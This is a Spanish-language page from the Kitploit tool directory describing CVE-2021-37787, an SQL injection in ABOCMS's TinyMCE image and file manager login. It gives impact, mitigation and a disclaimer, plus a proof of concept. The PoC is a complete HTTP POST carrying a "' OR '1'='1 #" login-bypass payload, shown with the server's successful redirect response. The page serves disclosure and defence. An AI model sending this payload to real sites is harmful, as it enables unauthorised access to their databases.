Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-37787 — CVE-2021-37787 | Kitploit
Herramientas/GitHubGitHub/vasykor/cve-2021-37787
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónAprendizaje y Educación
GitHubvasykor/cve-2021-37787

CVE-2021-37787

CVE-2021-37787

Ver Repositorio
12hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-37787: Inyección SQL en ABOCMS a través del módulo TinyMCE

Detalles de la vulnerabilidad

  • ID de CVE: CVE-2021-37787
  • Producto: ABOCMS
  • Versiones afectadas: 5.8.x, ≤5.9.3
  • Tipo de vulnerabilidad: Inyección SQL
  • Puntuación CVSS: 9.8

Descripción

Existe una vulnerabilidad crítica de inyección SQL en ABOCMS dentro del módulo TinyMCE. La vulnerabilidad surge debido a una saneamiento insuficiente de las entradas en la interacción del módulo TinyMCE con la base de datos, lo que permite a un atacante inyectar consultas SQL maliciosas. Esto puede provocar acceso no autorizado a los datos, modificación o incluso el compromiso total de la base de datos subyacente.

El endpoint vulnerable se encuentra en el procesamiento de las entradas proporcionadas por el usuario en el módulo TinyMCE. Un atacante puede explotar esta falla para ejecutar comandos SQL arbitrarios.

Impacto

  • Bypass de autenticación.
  • Extracción de datos sensibles.
  • Modificación o eliminación de registros de la base de datos.
  • Potencial ejecución remota de código, dependiendo de la configuración de la base de datos.

Prueba de concepto (PoC)

Solicitud POST

root@kitploit:~
POST /js/admin/tiny_mce/plugins/imagemanager/login_session_auth.php HTTP/1.1
Host: <yourdomain.name>
Content-Type: application/x-www-form-urlencoded

return_url=%2Fjs%2Fadmin%2Ftiny_mce%2Fplugins%2Fimagemanager%2Findex.php%3Ftype%3Dim%26page%3Dindex.html&login=1%27+OR+%271%27%3D1+%23&password=1&submit_button=Login

Respuesta

root@kitploit:~
HTTP/1.1 302 Found
Server: nginx-reuseport/1.21.1
Date: <date>
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
Keep-Alive: timeout=30
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
A-Powered-By: ABO.CMS 5.9.3 (fe01ce2a7fbac8fafaed7c982a04e229)
location: /js/admin/tiny_mce/plugins/imagemanager/index.php?type=im&page=index.html

Endpoint vulnerable

La vulnerabilidad se puede activar a través del siguiente endpoint:

/js/admin/tiny_mce/plugins/imagemanager/login_session_auth.php /js/admin/tiny_mce/plugins/filemanager/login_session_auth.php

Mitigación

  • Para usuarios:

    • Actualice a la última versión de ABOCMS.
    • Deshabilite el módulo TinyMCE si no es esencial.
  • Para desarrolladores:

    • Use sentencias preparadas o consultas parametrizadas para interactuar con la base de datos.
    • Actualice el módulo TinyMCE a la última versión segura.
    • Implemente una validación de entradas adecuada para filtrar cargas maliciosas.

Descargo de responsabilidad

Esta PoC se proporciona únicamente con fines educativos y de investigación en seguridad. No use este código para dañar sistemas o redes sin el permiso explícito del propietario. El autor no es responsable de ningún uso indebido o daño causado por esta PoC.

Descargar herramienta